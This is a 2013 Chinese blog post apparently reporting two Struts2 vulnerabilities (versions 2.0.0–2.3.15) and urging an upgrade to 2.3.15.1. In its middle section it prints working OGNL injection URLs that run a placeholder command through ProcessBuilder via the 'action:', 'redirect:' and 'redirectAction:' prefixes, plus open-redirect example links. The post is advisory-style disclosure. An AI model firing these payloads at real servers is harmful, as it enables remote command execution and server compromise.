Struts2 两大高危安全漏洞,网站安全再受考验

于 2013-07-22 14:05:32 发布
阅读量2.6k 收藏
点赞数
分类专栏: struts2 java 文章标签: struts2 java
java 同时被 2 个专栏收录
73 篇文章 1 订阅
订阅专栏
struts2
12 篇文章 0 订阅
订阅专栏

近日,Struts2 被曝出两个高危安全漏洞,影响的版本Struts 2.0.0 – Struts 2.3.15的 Struts2 全系版本,国内政府、金融、运营商及各大互联网公司的网站已受影响。

一个是使用缩写的导航参数前缀时的远程代码执行漏洞,另一个是使用缩写的重定向参数前缀时的开放式重定向漏洞。这些漏洞可使黑客取得网站服务器的“最高权限”,从而使企业服务器变成黑客手中的“肉鸡”。

Struts漏洞影响巨大,受影响站点以电商、银行、门户、政府居多,而且一些自动化、傻瓜化的利用工具开始出现,填入地址可直接执行服务器命令,读取数据甚至直接关机等操作。据乌云平台漏洞报告,淘宝、京东、腾讯等大型互联网厂商均受此影响。

了解Struts:

Struts 是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用 JavaServlet/JSP 技术,实现了基于 Java EEWeb 应用的MVC设计模式的应用框架,是MVC经典设计模式中的一个经典产品。使用Struts的目的是为了帮助我们减少在运用MVC设计模型来开发Web应用的时间。

详细介绍下 Struts2 的两大安全漏洞:

1. 通过在参数前面加上“action:”/“redirect:”/“redirectAction:”前缀,以实现远程代码执行,如下:

1http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
2 
3 
4http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
5 
6 
7http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

Struts2 远程代码执行漏洞

Struts2 远程代码执行漏洞

2. 通过在参数前面加上“redirect:”/“redirectAction:”前缀,以实现开放式重定向,如下:

1<a href="http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/">http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/</a>
2 
3<a href="http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23">http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23</a>

Struts2 开放式重定向漏洞

详细漏洞信息:

Struts2 官网:http://struts.apache.org/

为了网站和用户的安全,尽快更新到Struts 2.3.15.1安全版本吧。

叶威1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
博客
org.apache.zookeeper.KeeperException$NoNodeException: KeeperErrorCode = NoNode for /otter/channel/6/
06-22 7595
HTTP ERROR 500Problem accessing /channelList.htm. Reason:Failed to invoke Valve[#2/3, level 3]: com.alibaba.citrus.turbine.pipeline.valve.PerformTemplateScreenValve#14366f3:PerformTemplateScreen
博客
react-native-barcodescanner扫码第二次进去黑屏
05-03 2035
react-native(react-native-barcodescanner)扫码第一次进去的时候正常但是之后出现黑屏,在网上的说是新场景要pop掉(可能是我的版本和网上的版本不一样导致的),但是我pop掉了第二次进去还是黑屏,纠结了很久,猜测是调用了摄像头没有释放掉导致的,无奈只能动barcodescanner的源码了,看了该项目中的文件目录如下:期间修改过这三个文件很多其他的位
博客
ubuntu下nginx安装手记
11-30 701
Nginx是一个高性能的HTTP和反向代理服务器.Nginx 使用 Unix 下常用的 './configure && make && make install' 过程来编译安装.configure 脚本确定系统所具有一些特性,特别是 nginx 用来处理连接的方法。然后,它创建 Makefile 文件。官网:http://nginx.org/下载页面:http:/
博客
linux ubuntu 的桌面怎样关闭
09-06 6618
命令行模式(ctrl+alt+F2),执行一下 命令sudo /etc/init.d/lightdm stop (关闭窗口);sudo /etc/init.d/lightdm restart (重启窗口)
博客
linux iptables开放端口命令
09-06 7457
#/sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT#/sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT#/sbin/iptables -I INPUT -p tcp --dport 3306 -j ACCEPT然后保存:#/etc/rc.d/init.d/iptables sa
博客
微信支付有汉字时出现签名错误的解决办法
08-04 1902
最近发现在win2003/win2008开发微信支付时,有汉字时出现签名错误,但在win7上不会出错,最后发现是字符编码不一致造成的。解决办法改正wxpay-scanpay-java-sdk-1.0.jar中的md5.java文件,/**     * MD5编码     * @param origin 原始字符串     * @return 经过MD5加密之后的
博客
SpringMVC+MyBatis+logback
07-27 4088
目前主流的Web MVC框架,除了Struts这个主力 外,还有Spring MVC,主要是由于Spring MVC配置比较简单,使用起来也十分明了,非常灵活,与Spring 集成较好,对RESTful API的支持也比struts要好。MyBatis是ibatis的升级版,作为hibernate的老对手,它 是一个可以自定义SQL、存储过程和高级映射的持久层框架。与hibernate的主
博客
使用logback.xml配置来实现日志文件输出
07-27 1万+
Logback是由log4j创始人设计的又一个开源日志组件。logback当前分成三个模块:logback-core,logback- classic和logback-access。logback-core是其它两个模块的基础模块。logback-classic是log4j的一个 改良版本。此外logback-classic完整实现SLF4J API使你可以很方便地更换成其它日志系统如log4
博客
当spring 容器初始化完成后执行某个方法
07-25 1万+
在做web项目开发中,尤其是企业级应用开发的时候,往往会在工程启动的时候做许多的前置检查。比如检查是否使用了我们组禁止使用的Mysql的group_concat函数,如果使用了项目就不能启动,并指出哪个文件的xml文件使用了这个函数。而在Spring的web项目中,我们可以介入Spring的启动过程。我们希望在Spring容器将所有的Bean都初始化完成之后,做一些操作,这个时候我
博客
当在mybatis用到foreach的时候,会报这个错误Parameter '__frch_item_0' not found. Available parameters are [list]会出现的
06-28 8013
异常信息Caused by: org.apache.ibatis.binding.BindingException: Parameter '__frch_item_0' not found. Available parameters are [list]at org.apache.ibatis.session.defaults.DefaultSqlS
博客
Nginx负载均衡+监控状态检测
05-11 1万+
Nginx负载均衡与可用性检查在业界,一直流传这样一句话:Nginx抗并发能力强!为什么Nginx抗并发能力强?原因是使用了非阻塞、异步传输阻塞:如apache代理tomcat时,apache开启10个进程,同时处理着10个请求,在tomcat没有返回给apache结果时,apache是不会处理用户发出的第11个请求非阻塞:如nginx代理tomcat时,nginx开启1000个并
博客
js将long日期格式转换为标准日期格式
04-27 6445
"javascript">         //扩展Date的format方法       Date.prototype.format = function (format) {          var o = {              "M+": this.getMonth() + 1,              "d+": this.getDate(),     
博客
Quartz时间配置规则
04-21 1462
一个Cron-表达式是一个由六至七个字段组成由空格分隔的字符串,其中6个字段是必须的而一个是可选的,如下: 字段名允许的值允许的特殊字符 秒     0-59        , - * /分     0-59         , - * /小时    0-23         , - * /日     1-31         , - * ? / L W C
博客
SVN设置强制提交者填写注释信息,svn版本管理工具为VisualSVN Server 2.5.8
04-20 2039
环境简述:SVN服务器:WindowsSVN版本:VisualSVN Server 2.5.8操作方法:在SVN的Repositories下,找到要配置的项目,在项目目录下找到hooks文件夹,在其下创建pre-commit.bat文件,把下面复制进去就可以了(无需重启,如果改动,保存bat文件,配置就生效):================= bat文件内容 开始====
博客
Spring MVC之@RequestParam @RequestBody @RequestHeader 等详解
12-16 1395
引言:接上一篇文章,对@RequestMapping进行地址映射讲解之后,该篇主要讲解request 数据到handler method 参数数据的绑定所用到的注解和什么情形下使用;简介:handler method 参数绑定常用的注解,我们根据他们处理的Request的不同内容部分分为四类:(主要讲解常用类型)A、处理requet uri 部分(这里指ur
博客
基于RHEL 6.5安装Oracle 11g详细教程(4)安装Oracle前的准备
11-30 5058
4  安装Oracle前的准备 4.1 基本配置 4.1.1 关闭防火墙[root@oracle ~]# service iptables stopiptables: Setting chains to policy ACCEPT: filter [ OK ]iptables: Flushing firewall rules: [ OK ]iptables: U
博客
postman中 form-data、x-www-form-urlencoded、raw、binary的区别
11-23 13万+
1、form-data:                    就是http请求中的multipart/form-data,它会将表单的数据处理为一条消息,以标签为单元,用分隔符分开。既可以上传键值对,也可以上传文件。当上传的字段是文件时,会有Content-Type来表名文件类型;content-disposition,用来说明字段的一些信息;由于有boundary隔离,所以mu
博客
ki4so-发起一个史上最开源的sso项目
11-19 4710
最近一直在研究单点登录,研究了比较流行的开源单点登录系统——CAS,对其做了比较深入的研究,深入学习了其原理和源代码。对其有一个比较深入的认识,我们公司也是一直在用它实现单点登录,在用的过程中觉得CAS存在以下方面不太适合我们的地方。为什么要开发自己的SSO?1.重量级。CAS作为一个开源的通用的SSO系统,要考虑的东西太多,要遵循的协议也太多,因此在CAS里面有很多其实你根本用不
博客
springMVC–参数绑定常用的注解
11-02 1万+
springMVC–参数绑定常用的注解简介:handler method 参数绑定常用的注解,我们根据他们处理的Request的不同内容部分分为四类:(主要讲解常用类型)A、处理requet uri 部分(这里指uri template中variable,不含queryString部分)的注解:   @PathVariable;B、处理request heade
博客
linux scp远程拷贝文件及文件夹
09-08 1万+
1、拷贝本机/home/administrator/test整个目录至远程主机192.168.1.100的/root目录下 复制代码代码如下:scp -r /home/administrator/test/ [email protected]:/root/2、拷贝单个文件至远程主机 复制代码代码如下:scp /h

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值